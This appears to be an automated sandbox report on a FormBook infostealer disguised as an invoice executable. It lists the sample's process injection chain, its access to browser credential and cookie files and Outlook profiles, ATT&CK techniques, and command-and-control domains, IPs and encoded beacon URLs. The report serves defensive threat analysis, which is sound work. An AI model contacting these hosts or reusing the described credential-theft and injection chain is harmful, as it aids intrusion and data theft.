                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_001F3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,2_2_001F3D19
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0023411C SendInput,keybd_event,2_2_0023411C
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002374BB mouse_event,2_2_002374BB
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe"Jump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeProcess created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"Jump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0022A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_0022A66C
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002371FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_002371FA
                Source: tOxaspWNamv.exe, 00000008.00000002.3407307546.0000000001330000.00000002.00000001.00040000.00000000.sdmp, tOxaspWNamv.exe, 00000008.00000000.2409707120.0000000001330000.00000002.00000001.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409760212.0000000000FA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: ORIGINAL INVOICE COAU7230734290.exe, tOxaspWNamv.exe, 00000008.00000002.3407307546.0000000001330000.00000002.00000001.00040000.00000000.sdmp, tOxaspWNamv.exe, 00000008.00000000.2409707120.0000000001330000.00000002.00000001.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409760212.0000000000FA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: tOxaspWNamv.exe, 00000008.00000002.3407307546.0000000001330000.00000002.00000001.00040000.00000000.sdmp, tOxaspWNamv.exe, 00000008.00000000.2409707120.0000000001330000.00000002.00000001.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409760212.0000000000FA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: ORIGINAL INVOICE COAU7230734290.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: tOxaspWNamv.exe, 00000008.00000002.3407307546.0000000001330000.00000002.00000001.00040000.00000000.sdmp, tOxaspWNamv.exe, 00000008.00000000.2409707120.0000000001330000.00000002.00000001.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409760212.0000000000FA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002165C4 cpuid 2_2_002165C4
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0024091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,2_2_0024091D
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0026B340 GetUserNameW,2_2_0026B340
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00221E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00221E8E
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0020DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_0020DDC0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3408793565.0000000000D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2493193897.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2493863404.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3397246670.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2492860834.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3409182554.0000000004790000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3409416368.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3409702511.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\ktmutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: ORIGINAL INVOICE COAU7230734290.exeBinary or memory string: WIN_81
                Source: ORIGINAL INVOICE COAU7230734290.exeBinary or memory string: WIN_XP
                Source: ORIGINAL INVOICE COAU7230734290.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: ORIGINAL INVOICE COAU7230734290.exeBinary or memory string: WIN_XPe
                Source: ORIGINAL INVOICE COAU7230734290.exeBinary or memory string: WIN_VISTA
                Source: ORIGINAL INVOICE COAU7230734290.exeBinary or memory string: WIN_7
                Source: ORIGINAL INVOICE COAU7230734290.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3408793565.0000000000D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2493193897.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2493863404.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3397246670.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2492860834.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3409182554.0000000004790000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3409416368.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3409702511.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00248C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00248C4F
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0024923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_0024923B

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		3
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562307 Sample: ORIGINAL INVOICE COAU723073... Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 30 www.schedulemassage.xyz 2->30 32 www.huiguang.xyz 2->32 34 8 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected FormBook 2->48 52 5 other signatures 2->52 10 ORIGINAL INVOICE COAU7230734290.exe 2 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 32->50 process4 signatures5 64 Binary is likely a compiled AutoIt script file 10->64 66 Writes to foreign memory regions 10->66 68 Maps a DLL or memory area into another process 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 tOxaspWNamv.exe 13->16 injected process8 signatures9 42 Found direct / indirect Syscall (likely to bypass EDR) 16->42 19 ktmutil.exe 13 16->19         started        22 srdelayed.exe 16->22         started        process10 signatures11 54 Tries to steal Mail credentials (via file / registry access) 19->54 56 Tries to harvest and steal browser information (history, passwords, etc) 19->56 58 Modifies the context of a thread in another process (thread injection) 19->58 60 3 other signatures 19->60 24 tOxaspWNamv.exe 19->24 injected 28 firefox.exe 19->28         started        process12 dnsIp13 36 schedulemassage.xyz 3.33.130.190, 49866, 49874, 49883 AMAZONEXPANSIONGB United States 24->36 38 www.futurevision.life 203.161.49.193, 49906, 49913, 49919 VNPT-AS-VNVNPTCorpVN Malaysia 24->38 40 www.huiguang.xyz 154.216.76.80, 49827, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 24->40 62 Found direct / indirect Syscall (likely to bypass EDR) 24->62 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                ORIGINAL INVOICE COAU7230734290.exe68%ReversingLabsWin32.Trojan.AutoitInject
                ORIGINAL INVOICE COAU7230734290.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.huiguang.xyz/hv6g/?Hx=ot9h&yX7=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGBem8ABx5elB2IpCI9aOC0eTdsykMK9iQYMJsZcXRFR0PJFreT4Q=0%Avira URL Cloudsafe
                http://www.futurevision.life/hxmz/0%Avira URL Cloudsafe
                http://www.mcfunding.org/0598/0%Avira URL Cloudsafe
                http://www.beingandbecoming.ltd/79tr/?yX7=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&Hx=ot9h0%Avira URL Cloudsafe
                http://www.beingandbecoming.ltd/79tr/0%Avira URL Cloudsafe
                http://www.mcfunding.org/0598/?yX7=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM=&Hx=ot9h0%Avira URL Cloudsafe
                http://www.futurevision.life/hxmz/?Hx=ot9h&yX7=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H768cQaPGnwmWpoBoTXnujTk0fw5ooQYelqhpppqeWfG8SjK30Qts=0%Avira URL Cloudsafe
                http://www.mcfunding.org0%Avira URL Cloudsafe
                https://34.92.79.175:198170%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                mcfunding.org
                		3.33.130.190
                		truetrue
                  		unknown
                  www.huiguang.xyz
                  		154.216.76.80
                  		truefalse
                    		high
                    beingandbecoming.ltd
                    		3.33.130.190
                    		truetrue
                      		unknown
                      migorengya8.click
                      		198.252.98.54
                      		truetrue
                        		unknown
                        fp2e7a.wpc.phicdn.net
                        		192.229.221.95
                        		truefalse
                          		high
                          www.futurevision.life
                          		203.161.49.193
                          		truefalse
                            		high
                            schedulemassage.xyz
                            		3.33.130.190
                            		truetrue
                              		unknown
                              www.beingandbecoming.ltd
                              		unknown
                              		unknownfalse
                                		unknown
                                www.migorengya8.click
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.mcfunding.org
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.schedulemassage.xyz
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.futurevision.life/hxmz/?Hx=ot9h&yX7=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H768cQaPGnwmWpoBoTXnujTk0fw5ooQYelqhpppqeWfG8SjK30Qts=true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.mcfunding.org/0598/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.futurevision.life/hxmz/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.mcfunding.org/0598/?yX7=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM=&Hx=ot9htrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.huiguang.xyz/hv6g/?Hx=ot9h&yX7=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGBem8ABx5elB2IpCI9aOC0eTdsykMK9iQYMJsZcXRFR0PJFreT4Q=true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.beingandbecoming.ltd/79tr/?yX7=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&Hx=ot9htrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.beingandbecoming.ltd/79tr/true
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://ac.ecosia.org/autocomplete?q=ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtabktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://34.92.79.175:19817ktmutil.exe, 0000000B.00000002.3412669118.0000000003BE4000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3414389532.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409897296.0000000002A74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2799096462.0000000017A24000.00000004.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://hm.baidu.com/hm.js?cf95fa39f4a72ce6b85bbfbe9eadb95aktmutil.exe, 0000000B.00000002.3412669118.0000000003BE4000.00000004.10000000.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409897296.0000000002A74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2799096462.0000000017A24000.00000004.80000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.mcfunding.orgtOxaspWNamv.exe, 0000000E.00000002.3408793565.0000000000DE4000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.ecosia.org/newtab/ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ktmutil.exe, 0000000B.00000003.2693767995.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          203.161.49.193
                                                          		www.futurevision.lifeMalaysia
                                                          		45899VNPT-AS-VNVNPTCorpVNfalse
                                                          154.216.76.80
                                                          		www.huiguang.xyzSeychelles
                                                          		132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                          3.33.130.190
                                                          		mcfunding.orgUnited States
                                                          		8987AMAZONEXPANSIONGBtrue

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1562307
                                                          Start date and time:2024-11-25 13:43:17 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 9m 2s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:15
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:2
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:ORIGINAL INVOICE COAU7230734290.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@9/3@6/3
                                                          EGA Information:
                                                          • Successful, ratio: 75%
                                                          HCA Information:
                                                          • Successful, ratio: 95%
                                                          • Number of executed functions: 52
                                                          • Number of non-executed functions: 293
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target tOxaspWNamv.exe, PID 4608 because it is empty
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • VT rate limit hit for: ORIGINAL INVOICE COAU7230734290.exe

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          07:45:23API Interceptor1383084x Sleep call for process: ktmutil.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          203.161.49.193Payroll List.exeGet hashmaliciousFormBookBrowse
                                                          • www.futurevision.life/hxmz/
                                                          MV KODCO.exeGet hashmaliciousFormBookBrowse
                                                          • www.futurevision.life/hxmz/?jD=VzTtTZ&1H=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws=
                                                          PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                          • www.inspires.website/tv3i/
                                                          Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.futurevision.life/hxmz/
                                                          PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                          • www.futurevision.life/hxmz/
                                                          Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                          • www.futurevision.life/cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM
                                                          Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • www.eco-tops.website/n54u/
                                                          Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                          • www.futurevision.life/hxmz/
                                                          DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                          • www.harmonid.life/aq3t/
                                                          DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                          • www.harmonid.life/aq3t/
                                                          154.216.76.80Payroll List.exeGet hashmaliciousFormBookBrowse
                                                            3.33.130.190santi.exeGet hashmaliciousFormBookBrowse
                                                            • www.espiritismo.info/4knb/
                                                            TAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                            • www.platinumkitchens.info/x3qa/
                                                            Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                            • www.goldstarfootwear.shop/8m07/
                                                            Payroll List.exeGet hashmaliciousFormBookBrowse
                                                            • www.mcfunding.org/0598/
                                                            NEW PURCHASE ORDER DRAWINGSSPECS 5655-2024.vbeGet hashmaliciousFormBookBrowse
                                                            • www.qwibie.net/83g2/
                                                            HXpVpoC9cr.exeGet hashmaliciousFormBookBrowse
                                                            • www.micrhyms.info/y7on/
                                                            MV KODCO.exeGet hashmaliciousFormBookBrowse
                                                            • www.mcfunding.org/0598/?1H=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&jD=VzTtTZ
                                                            Order No 24.exeGet hashmaliciousFormBookBrowse
                                                            • www.marketprediction.app/ucmb/
                                                            PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                            • www.livelovechat.live/pd34/
                                                            Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                            • www.theproselytizer.net/zyfi/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            www.huiguang.xyzPayroll List.exeGet hashmaliciousFormBookBrowse
                                                            • 154.216.76.80
                                                            MV KODCO.exeGet hashmaliciousFormBookBrowse
                                                            • 154.92.61.37
                                                            Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 154.92.61.37
                                                            PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                            • 154.92.61.37
